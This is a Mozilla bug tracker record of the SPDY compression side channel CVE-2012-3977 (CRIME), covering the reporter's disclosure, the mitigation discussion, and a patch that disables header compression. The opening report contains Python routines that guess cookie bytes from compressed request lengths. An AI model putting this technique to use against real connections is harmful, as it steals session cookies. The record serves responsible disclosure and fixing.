Closed Bug 779413 (CVE-2012-3977) Opened 13 years ago Closed 13 years ago

SPDY compression infoleak (CRIME)

Categories

(Core :: Networking: HTTP, defect)

x86
All
defect
Not set
normal

Tracking

()

RESOLVED FIXED
mozilla17
Tracking Status
firefox14 - wontfix
firefox15 + fixed
firefox16 + verified
firefox17 + fixed
firefox-esr10 --- unaffected

People

(Reporter: thaidn, Assigned: mcmanus)

References

Details

(Keywords: reporter-external, sec-high, Whiteboard: [spdy][advisory-tracking+][embargo until Chrome 22 ships in September, 2012][qa-])

Attachments

(1 file)

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11 Steps to reproduce: 1. Introduction It's a known vulnerablity that combining compression with encryption can sometimes reveal information that would not have been revealed without compression [1]. We've developed working exploits for this vulnerablity in Firefox's implementation of SPDY compression. There are two attacks, both can reliably extract cookies from SPDY over SSL/TLS just by: * using Javascript to create new <img> tags pointed to target domain * looking at the lengths of the resulting encrypted SPDY streams It's worth noting that our attacks don't require any plugins; we use Javascript to make them faster, but it's possible to implement them even without any scripting capabilities. Actual results: 2. First attack: Two Tries In SPDY the entire contents of the name/value header block including the URL and cookies is compressed using zlib deflate. Suppose that the cookie name is SID, and we want to obtain the first byte of its value, which is supposed to be the byte A. The first attack, which we call Two Tries, works as follows. For each byte (guesschar) in the cookie's characterset, it constructs two URLs using this function: GUESS_LEN = 4 WINDOW_LEN = 2**15 - 262 # zlib's default window size, see http://www.zlib.net/zlib_tech.html PAD_BYTE = '&' REQ = " HTTP/1.1\r\nHost: localhost:8443\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.15 Safari/537.1\r\nAccept: */*\r\nReferer: https://localhost:8443/a.html\r\nAccept-Encoding gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\nCookie: " def two_guess(known, guesschar): guess = known[-(GUESS_LEN-1):] + guesschar # ID=x boundary = PAD_BYTE * GUESS_LEN url1 = guess + boundary url2 = boundary + guess total_pad = WINDOW_LEN - len(REQ)- len(known) - 5 - 1 # 5 for "GET /", and 1 for the guesschar padding = PAD_BYTE * total_pad url1 += padding url2 += padding return (url1, url2) where known is "SID=". The trick here is to make sure that guess is out of zlib's window size in url1, but not so in url2. These two URLs are then used to open new cookie-bearing requests to target (e.g., setting them as image sources.) Here is our oracle: * When guess isn't equal to ID=A, lengths of both sync streams would be the same. * When guess is equal to ID=A, lengths of both sync streams would be different. This happens because the string "ID=A" in cookie would be replaced by a reference to the same string in the url2. We found that this oracle is reliably enough to extract cookies. 3. Second attack While Two Tries is a generic attack, we've also developed a specific attack for SPDY. We found that SPDY uses a single zlib stream (context) for all name value pairs in one direction on a SPDY connection. This is understandably to get the most out of compression, i.e., this makes subsequent header blocks compress to very small outputs. So small that zlib decides to use fixed Huffman codes (see section 3.2.6 in [1],) which assign long code lengths to literals. This allows us to conduct an easier attack as follows: def random_str(length): chars = BASE64 return ''.join(random.choice(chars) for i in xrange(length)) def next_byte(known, alphabet=BASE64): # the first request is to "reset" the compression state so that # subsequent requests would compress to fixed Huffman codes reset = known[-5:] + '?' url = "/?%s%s" % (random_str(2), reset) query(url) # the second request is used to determine the length of requests with incorrect guess # '.' can be replaced with any chars not in the cookie's characterset incorrect = known[-5:] + '.' url = "/?%s%s" % (random_str(2), incorrect) length = query(url) good = alphabet while len(good) != 1: for c in good: guess = known[-5:] + c url = '/?%s%s' % (random_str(2), guess) i = query(url) # if guess matches a substring of cookie, # the length of the resulting request would be smaller than those don't match if i >= length: good.remove(c) return good[0] This attack is 100% reliable, for both SPDY/2 and SPDY/3. Note that all of these attacks described so far are not necessarily the best ones (in term of number of requests per byte for example.) We include them here because they are simple, hence easier to explain/understand. We have slightly more complicated algorithms that can make it down to a few requests per byte.
See http://code.google.com/p/chromium/issues/detail?id=139744 for a discussion of possible solutions.
OS: Mac OS X → All
Component: Untriaged → Networking: HTTP
Product: Firefox → Core
Summary: SPYD compression infoleak → SPDY compression infoleak
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: sec-high
CC'ing Chris Evans from the Chrome security team. Since we can't see the chromium discussion perhaps he can add the relevant bits to this bug.
Status: NEW → UNCONFIRMED
Ever confirmed: false
Keywords: sec-high
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: sec-high
We're working on a workaround on the client side at the moment. We'll let you know as soon as we have something.
(In reply to Brian Smith (:bsmith) from comment #4) > Similar issues were discussed last year on spdy-dev: > https://groups.google.com/d/msg/spdy-dev/B_ulCnBjSug/rcU-SIFtTKoJ Yes. Once again, had I the time to follow up on all my ideas, the world would be a better place :)
For SPDY/4, we're redoing the compression anyway and can fix this in the design. For SPDY/2 and SPDY/3 we want a workaround. I have a change that implements the following rules out for review for SPDY/2 and 3: We classify header values into three types: whitelisted, "cookies" and non-whitelisted. Whitelisted header values (and all other data) compress normally except for the fact that they never back reference "cookies" or non-whitelisted header values. Non-whitelisted header values are compressed in a unique Huffman context for each value and never back reference other data in the window. "cookies" is split into a series of cookie values. Each cookie value is terminated with a semicolon and there's no whitespace in between. Cookie values are compressed in unique Huffman contexts and may only back reference in their entirety and the match must be proceeded by either a semicolon or standard data. This means that cookie values either back reference the exact same value from the window, or are encoded in full. This involves patching zlib and does impact the compression rates. However, analysis shows that our window is currently too small and so our compression is actually pretty bad already. Therefore this doesn't do too much. If we simulate increasing the window, then we see an impact. Some cookies are longer than MAX_MATCH and so never match and some of those cookies have internal redundancy that we're also excluding. Currently the whitelist looks like: 773 } else if (it->first == "accept" || 774 it->first == "accept-charset" || 775 it->first == "accept-encoding" || 776 it->first == "accept-language" || 777 it->first == "host" || 778 it->first == "version" || 779 it->first == "method" || 780 it->first == "scheme" || 781 it->first == ":host" || 782 it->first == ":version" || 783 it->first == ":method" || 784 it->first == ":scheme" || 785 it->first == "user-agent") {
Gecko doesn't enable TLS-level compression so only the SPDY header compression stuff is relevant to us at the current time. Options: 1. The simplest, lowest-risk workaround is to turn SPDY off until we implement a version of SPDY that is designed to counteract this. AFAICT, this is something we can do with the Hotfix addon for Firefox 14, and something we can do with a code change for a Firefox 14.x chemspill. 2. AFAICT, the next simplest, next lowest-risk workaround is to configure zlib to "store only" mode (Z_NO_COMPRESSION). That way, we output the zlib stream that the SPDY spec requires, but we don't actually do any compression so we would avoid leaking cookies through the length side-channel via back-references and Huffman coding. This should almost definitely result in better performance than #1, and it is (I think) a one-line change so it would also be acceptable for a Firefox 14 chemspill and/or Firefox 15 betas. 3. (A variant of) the workaround that Adam proposes in Comment 6, or similar. 4. It doesn't seem totally crazy to say that we would probably be mostly safe from attacks if we did compression as normal for same-origin requests, but turned off compression (option #2) for cross-origin requests. Then (as far as I can tell off the top of my head), this would only work if the attacker's script XSS'd the victim domain. Still, this doesn't seem better than doing #3 and it might even be more work. I suggest we do #2 now and then attempt option #3 if/when we have time to do so, possibly only doing #3 on -aurora and -central. Patrick, do you think it is worthwhile to attempt a workaround like Adam's to keep some level of compression, given current SPDY adoption rates and given the (in)effectiveness of the header compression in general? (In reply to Adam Langley from comment #6) > Whitelisted header values (and all other data) compress normally except for > the fact that they never back reference "cookies" or non-whitelisted header > values. Is this just a side-effect of the changes mentioned below?
(In reply to Brian Smith (:bsmith) from comment #7) > I suggest we do #2 now and then attempt option #3 if/when we have time to do > so, possibly only doing #3 on -aurora and -central. That seems reasonable. > > Whitelisted header values (and all other data) compress normally except for > > the fact that they never back reference "cookies" or non-whitelisted header > > values. > > Is this just a side-effect of the changes mentioned below? In order to achieve this, zlib is patched to keep a bit for each byte in the window. Bytes from cookie values and non-whitelisted header values set this corresponding bit. When compressing normal data, zlib checks that any back references don't include tagged bytes from the window.
(In reply to Brian Smith (:bsmith) from comment #7) > Gecko doesn't enable TLS-level compression so only the SPDY header > compression stuff is relevant to us at the current time. > > Options: > > 1. The simplest, lowest-risk workaround is to turn SPDY off until we > implement a version of SPDY that is designed to counteract this. AFAICT, > this is something we can do with the Hotfix addon for Firefox 14, and > something we can do with a code change for a Firefox 14.x chemspill. > > 2. AFAICT, the next simplest, next lowest-risk workaround is to configure > zlib to "store only" mode (Z_NO_COMPRESSION). That way, we output the zlib > stream that the SPDY spec requires, but we don't actually do any compression > so we would avoid leaking cookies through the length side-channel via > back-references and Huffman coding. This should almost definitely result in > better performance than #1, and it is (I think) a one-line change so it > would also be acceptable for a Firefox 14 chemspill and/or Firefox 15 betas. > > 3. (A variant of) the workaround that Adam proposes in Comment 6, or similar. > > 4. It doesn't seem totally crazy to say that we would probably be mostly > safe from attacks if we did compression as normal for same-origin requests, > but turned off compression (option #2) for cross-origin requests. Then (as > far as I can tell off the top of my head), this would only work if the > attacker's script XSS'd the victim domain. Still, this doesn't seem better > than doing #3 and it might even be more work. > > I suggest we do #2 now and then attempt option #3 if/when we have time to do > so, possibly only doing #3 on -aurora and -central. > I tentatively agree, but I'm going to give the matter some more thought on the flight home. Assuming nothing new comes to mind I'll make the effectively-no-compression change no later than monday and we can get that either into a chemspill or 15 according to what release drivers want. > Patrick, do you think it is worthwhile to attempt a workaround like Adam's > to keep some level of compression, given current SPDY adoption rates and > given the (in)effectiveness of the header compression in general? yes, we want to do something here. We actually get very good compression rates (>75% requests are reduced 95% or more) that interact positively with cwnd to really help the mux rate, but we use full 32KB windows to do the work. So its an important feature (but its not the most important feature - that's mux.. so a compressionless but muxed spdy is still worth having). after getting the chemspill out we might want a custom zlib, or we might want to fast track a spdy/4 with a table driven compression scheme that would be resilleint here. more thought needed. too early to comment on backporting potential. I'll query will and roberto too. > > (In reply to Adam Langley from comment #6) > > Whitelisted header values (and all other data) compress normally except for > > the fact that they never back reference "cookies" or non-whitelisted header > > values. > > Is this just a side-effect of the changes mentioned below?
(In reply to Adam Langley from comment #6) > 773 } else if (it->first == "accept" || > 777 it->first == "host" || > 779 it->first == "method" || > 781 it->first == ":host" || > 783 it->first == ":method" || > 784 it->first == ":scheme" || Accept, host, and method can be controlled by the attacker with XHR and "host" can be controlled by the attacker even without XHR. (Consider the case where the server is using a wildcard certificate and all subdomains resolve to the same IP so that we coalesce the connections into one.) Or, is the criteria for inclusion of this list "the attacker already knows the value" instead of "the attacker can't control the value"? (In reply to Patrick McManus [:mcmanus] from comment #10) > after getting the chemspill out we might want a custom zlib, or we might > want to fast track a spdy/4 with a table driven compression scheme that > would be resilleint here. I looked in the mailing list archives and I couldn't figure out where a new header compression scheme is being worked on. Do you have a link?
(In reply to Brian Smith (:bsmith) from comment #11) > Or, is the criteria for inclusion of this list "the attacker already knows > the value" instead of "the attacker can't control the value"? > the former makes sense to me. as long as they can control something (uri) the attack works to find unknown items, right? > (In reply to Patrick McManus [:mcmanus] from comment #10) > > after getting the chemspill out we might want a custom zlib, or we might > > want to fast track a spdy/4 with a table driven compression scheme that > > would be resilleint here. > > I looked in the mailing list archives and I couldn't figure out where a new > header compression scheme is being worked on. Do you have a link? https://groups.google.com/forum/#!topic/spdy-dev/n-GEGoou4CE its just a prelim proposal that would, as written, still have this exposure.. but the basic property of having values be atomic and table driven probly provides a solution path as I understand it.
Whiteboard: [spdy]
Attached patch patch 0 — — Splinter Review
this patch disables upstream compression.. its a triage measure while we figure out whether the next step is a custom zlib like agl describes, a protocol change, or some other bit of hackery not yet thought up. @try confirmed interop with twitter/google.com/gmail/nginx/jetty
Attachment #649531 - Flags: review?(bsmith)
Comment on attachment 649531 [details] [diff] [review] patch 0 Review of attachment 649531 [details] [diff] [review]: ----------------------------------------------------------------- ::: netwerk/protocol/http/SpdySession2.cpp @@ +553,5 @@ > mUpstreamZlib.opaque = Z_NULL; > > + // mixing carte blanche compression with tls subjects us to traffic > + // analysis attacks > + deflateInit(&mUpstreamZlib, Z_NO_COMPRESSION); Why are we not checking the return values for these zlib functions? I expect that when we get close to an OOM condition, this will return an error code and I'm not sure what zlib will do if we pass a partially-initialized context to it. (See also inflateInit, deflateSetDictionary, etc.) We should NS_RUNTIMEABORT if these functions fail due to OOM, and return NS_ERROR_UNEXECTED if they return another error code. (We could perhaps have an NS_ENSURE_ZLIB_SUCCESS(x) macro that helps with these checks.) @@ +558,1 @@ > deflateSetDictionary(&mUpstreamZlib, It's not necessary to set the dictionary when no compression is happening. We should comment this call out. ::: netwerk/protocol/http/SpdySession3.cpp @@ +559,1 @@ > deflateSetDictionary(&mUpstreamZlib, Ditto.
Attachment #649531 - Flags: review?(bsmith) → review+
(In reply to Brian Smith (:bsmith) from comment #14) > Comment on attachment 649531 [details] [diff] [review] > patch 0 I'm not planning to make either of the changes you suggest mostly because I only want to port the minimum necessary changes to various branches that accomplish the patch's objectives while minimizing regression risk. But I'm happy to talk about them :) > > Review of attachment 649531 [details] [diff] [review]: > ----------------------------------------------------------------- > > ::: netwerk/protocol/http/SpdySession2.cpp > > Why are we not checking the return values for these zlib functions? I expect > that when we get close to an OOM condition, this will return an error code > and I'm not sure what zlib will do if we pass a partially-initialized > context to it. (See also inflateInit, deflateSetDictionary, etc.) > we can check in another patch, but zlib uses infallible malloc (see the explicit allocator references) already so the specific OOM concerns are not germane. > > @@ +558,1 @@ > > deflateSetDictionary(&mUpstreamZlib, > > It's not necessary to set the dictionary when no compression is happening. > We should comment this call out. I think that would generate an invalid spdy stream. It would create a rfc 1950 stream with the FDICT flag set to 0, and the FDICT field set to a checksum other than the one defined by the protocol. Even though the dictionary is unused to generate the compression stream with no_compresson, a receiver would be right in thinking the header was invalid. (we admittedly aren't so picky - maybe we should be :))
Comment on attachment 649531 [details] [diff] [review] patch 0 Risk here of serious problem is pretty low because the change is tightly confined and interop has been confirmed with the big spdy server deployments. I think porting to aurora-16 and beta-15 is a good idea. I personally don't think a port to -14 w/chemspill is necessary because * 15 is coming soon * there hasn't been an in-the-wild version of this attack cited (or implied afaik) * the attack still requires sniffing access to the generated TLS stream, so it can't spread without some physical proximity (i.e. it can't be wholly performed in JS) Brian mentioned the possibility of a chemspill in comment 7, so I'm setting the a? flag so a decision can be made.
Attachment #649531 - Flags: approval-mozilla-release?
Attachment #649531 - Flags: approval-mozilla-beta?
Attachment #649531 - Flags: approval-mozilla-aurora?
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla17
Comment on attachment 649531 [details] [diff] [review] patch 0 Approving for Beta/Aurora and am looking into whether we want to chemspill or hotfix for 14.
Attachment #649531 - Flags: approval-mozilla-beta?
Attachment #649531 - Flags: approval-mozilla-beta+
Attachment #649531 - Flags: approval-mozilla-aurora?
Attachment #649531 - Flags: approval-mozilla-aurora+
Adam, is the zlib code something you can share at this point?
one last note on the chemspill decision - to do this attack without actively rewriting packets you need to both passively observe the traffic (generally requires physical proximity) and bait someone into running the exploit page at the same time. So there is a decent bar to be surpassed there.
Comment on attachment 649531 [details] [diff] [review] patch 0 Confirmed with dveditz that we do not need to chemspill for this, it's privately reported, not in the wild, and there's no imminent danger that we can't wait the two weeks until 15 goes out.
Attachment #649531 - Flags: approval-mozilla-release? → approval-mozilla-release-
Whiteboard: [spdy] → [spdy][advisory-tracking+]
Alias: CVE-2012-3977
Patrick, is there another bug for re-enabling compression? I agree that we don't need to chemspill 14 for this.
(In reply to Brian Smith (:bsmith) from comment #24) > Patrick, is there another bug for re-enabling compression? > right now its just on my private todo list just because I haven't figured out what the security setting on the bug would be. Feel free to file and assign to me if I don't get to it first.
(sorry for the silence, was on vacation.) Chrome's zlib changes have landed in http://src.chromium.org/viewvc/chrome?view=rev&revision=151720. That doesn't appear to have broken the canary build over the past few days so I'll request a merge to the M22 branch. Chrome 22 should be stable in 4-5 weeks.
Blocks: 785279
Whiteboard: [spdy][advisory-tracking+] → [spdy][advisory-tracking+][embargo until Chrome 22 ships in September, 2012]
Thai: is bug going to be featured in your ekoparty CRIME talk? http://www.ekoparty.org/speakers-2012.php#duong
Yes this vulnerability will be presented at Ekoparty 2012, September 21st, Buenos Aires, Argentina
One question: it seems that Firefox 15 has turned header compression off, correct?
(In reply to Thai Duong from comment #29) > One question: it seems that Firefox 15 has turned header compression off, > correct? Correct, Firefox 15 includes attachment 649531 [details] [diff] [review].
Summary: SPDY compression infoleak → SPDY compression infoleak (CRIME)
Thai, can you please help us by verifying this is fixed in Firefox 17.0 Beta and 16.0.1?
Whiteboard: [spdy][advisory-tracking+][embargo until Chrome 22 ships in September, 2012] → [spdy][advisory-tracking+][embargo until Chrome 22 ships in September, 2012][qa-]
What have you done? Last time I checked, it was fixed in FF 15.
Haven't done anything, we just want to make sure Firefox 16.0.1 and 17.0 Beta are also fixed. Can you help us out by testing those builds?
I verify that the header isn't compressed in Firefox 16.0.1. I don't have 17.0 beta, but if you haven't change anything then you'll be fine.
Thanks Thai, marking this verified fixed for Firefox 16 based on your testing.
Group: core-security
rforbes-bugspam-for-setting-that-bounty-flag-20130719
Flags: sec-bounty+
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: